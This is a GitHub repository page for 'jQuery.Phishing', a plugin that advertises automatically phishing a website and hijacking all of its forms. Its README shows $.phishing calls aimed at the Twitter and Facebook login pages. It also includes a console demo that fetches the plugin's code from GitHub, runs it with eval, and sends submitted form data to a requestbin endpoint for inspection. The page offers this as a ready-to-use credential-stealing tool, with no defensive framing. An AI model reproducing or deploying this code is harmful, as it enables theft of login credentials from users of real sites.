Skip to content

Auto phishing a website, and hijack all form.

Notifications You must be signed in to change notification settings

CyDoor/jQuery.Phishing

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

17 Commits
 
 
 
 

Repository files navigation

jQuery.Phishing

Usage

Phishing and Hijack All Form

$.phishing('https://twitter.com/login','//your_request_bin')

onload

$.phishing('https://twitter.com/login',()=>alert`onload`)

Demo

  1. Open your website
  2. F12 call dev-tool -> console -> input:
$.get(`https://raw.githubusercontent.com/jackmasa/jQuery.Phishing/master/jQuery.Phishing.js`,c=>{
  eval(c);
  $.phishing(`//fb.com`,`//requestbin.herokuapp.com/1koaluq1`);
});
  1. try submit form :)
  2. see result: http://requestb.in/1koaluq1?inspect

About

Auto phishing a website, and hijack all form.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published